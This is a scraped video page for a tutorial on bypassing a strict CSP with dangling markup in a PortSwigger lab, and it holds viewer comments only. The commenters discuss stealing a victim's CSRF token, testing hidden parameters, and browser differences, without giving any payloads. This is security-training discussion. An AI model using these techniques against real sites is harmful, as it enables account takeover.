Reflected XSS Protected by Very Strict CSP with Dangling Markup Attack

Рет қаралды 4,676

Күн бұрын

Пікірлер: 40

@minionikgaming-clashroyale6754 Жыл бұрын

I don't understand why only 480 people has watched this masterpiece explanation 🎉🎉🎉🎉 Loved it sir. You explained my most favourite bug type so efficiently.

@mostafamohammed5080 4 ай бұрын

I was disappointed when I did not find your explanation in portswigger lab and was ready to skip it at all because I did not understand a thing, but fortunately I tried to search a bit and was thrilled to see your amazing videos 🥰😍 Thank you very much for your kindness and amazing explanation👍

@bayaspirinha Жыл бұрын

This lab cannot be solved in this way anymore, they patched using the URL of the lab as a replacement of Burp, very sad. Thanks for the video anyway, I learned a lot :)

@jesusgavancho9170 Жыл бұрын

It can be solved try to escape

@Hugo-my3ek 11 ай бұрын

@@jesusgavancho9170 How?

@mikeyfinn2 10 ай бұрын

@@jesusgavancho9170 it appears the robot user won't click on the bait if the href URL targets the exploit server; did you get around that?

@austynstephens9263 10 ай бұрын

Thanks, I was losing my mind until I found this comment lol

@fm0x1 Жыл бұрын

Whoaa! the explanation was amazing, thanks you for share your knowledge bro.

@milapmerja5033 Жыл бұрын

Great explanation brother. Helpful for a beginner to understand easily.

@1n3c 11 ай бұрын

Very good job. Definitely worth watching.

@shooterdd632 Жыл бұрын

stealing CSRF token didn't work? Something were changed in this lab

@nishantdalvi9470 Жыл бұрын

Yes i am able to grab CSRF token of my own (wiener) from the exploit server's access logs but i can't see the CSRF token of the victim when i do deliver exploit to the victim. Lab is not doing the simulation thing any more

@jesusgavancho9170 Жыл бұрын

Vicitm is using Google Chrome so dangling markup injection won't work, in Firefox works. I did in another way escaping @@nishantdalvi9470

@vlads4779 11 ай бұрын

@@nishantdalvi9470 same issue here

@hichamzouhri395 10 ай бұрын

I have the same problem 😢

@mikeyfinn2 10 ай бұрын

@@hichamzouhri395 Yep, I did a one-click version with js that works great on my own user, but near as I can tell the robot user never clicks on the "Click". I suspect that anything that isn't a official Collaborator URL is getting blocked once the user has the initial page. OK, fine, they're a business.

@MrCredo-tz5rh Жыл бұрын

Thank you for your explanation!!!

@lukeastorw Жыл бұрын

8:20 it can be use for open redirect vul..?

@sr.holmes5552 10 ай бұрын

como siempre tus videos son una joya

@nazuko2721 4 ай бұрын

there's another lab related to CSP has been added in portswiger please solve that lab too the time of your recoding that lab didn't been added but now it's added please solve it

@mostafa12979 11 ай бұрын

Thank you so much ❤

@youssef-kz3yn 6 ай бұрын

Please sir can you check if this exploit is still working on chrome latest version?? because it doesn't seem to work on chrome but the same exploit works on me on firefox

@ashrafbrown6695 5 ай бұрын

same here

@gabutplay7961 Ай бұрын

same here, did you able to solved it ?

@amaljose6374 8 ай бұрын

By doing it your way without burp collaburator while clicking the "click me" link after exploit server it says "invalid host" And when I try to do by the solution after delivering the exploit via exploit server and collaburator then I didnt get any DNS or HTTP interactions in the collaburator menu. Does anybody know any solutions :) Please ignore my language mistakes

@youssef-kz3yn 6 ай бұрын

The exploit is not working on chrome anymore that is weird because the victim is using chrome , I tried on firefox and the exploit works on me , but on the victim it is not working

@amaljose6374 6 ай бұрын

@@youssef-kz3yn very kind of you to considering my comment ❤️

@youssef-kz3yn 6 ай бұрын

@@amaljose6374 you are welcome my friend if you find any solution please bring me back here

@0wners5651 6 ай бұрын

thank you sir

@javeleyjaveley Жыл бұрын

Why do you know GET has the hidden parameter email?

@z3nsh3ll Жыл бұрын

It's a good question. I don't see a reason why we are supposed to know that. My guess is that portswigger is encouraging trying out some logical GET parameters even if a site doesn't appear to be using them.

@mikeyfinn2 10 ай бұрын

the URL has the id parameter, so that's a clue it might take others too; it's a hard problem to strike a balance between "expert" level labs vs. focusing on the core issue without weighing down the exercise with material covered in previous labs

@javeleyjaveley 10 ай бұрын

I want to discuss the issue of hidden parameters, which is often mentioned in many fuzz bounty articles. However, I have not encountered this in practice, except in target practice. A normal website usually has hundreds of API interfaces and parameters. Even if we collect all the parameters and conduct fuzz testing on all interfaces, it would still be a significant workload. I'm not sure how much time others spend on exploring a single website when they are bounty hunting, but my patience only allows me to spend 2 to 3 hours on a website. This includes directory exploration, understanding the site's logic and functionality, as well as fuzzing and port scanning. @@mikeyfinn2

@garthoid 5 ай бұрын

In general, any form input elements with name should be tested as url parameters.